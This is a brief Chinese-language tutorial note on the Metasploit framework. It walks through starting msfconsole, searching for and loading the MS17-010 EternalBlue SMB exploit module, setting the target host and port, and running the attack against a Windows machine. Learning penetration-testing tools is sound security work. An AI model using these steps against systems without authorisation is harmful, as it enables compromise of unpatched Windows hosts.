metasploit
是什么
metasploit是什么?
msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。
运用
1. sudo进入root权限
sudo su
2.metasploit framework
进入命令行
msfconsole
3. 初始化metasploit数据库(非必须)
msfdb init
4. 查询模块 search
search ms17_010
5. 使用模块:use+模块or编号
use exploit/windows/smb/ms17_010_eternalblue
use 0
6. 查看必选项(require为yes)
show options
7. 查看目标机ip地址
windows系统中打开cmd(win+r)
ipconfig
8. 设置目标机 set
set RHOSTS 192.168.XXX.XX
可设置端口
set lport xxxx
9. 进行攻击 run
run
开始攻击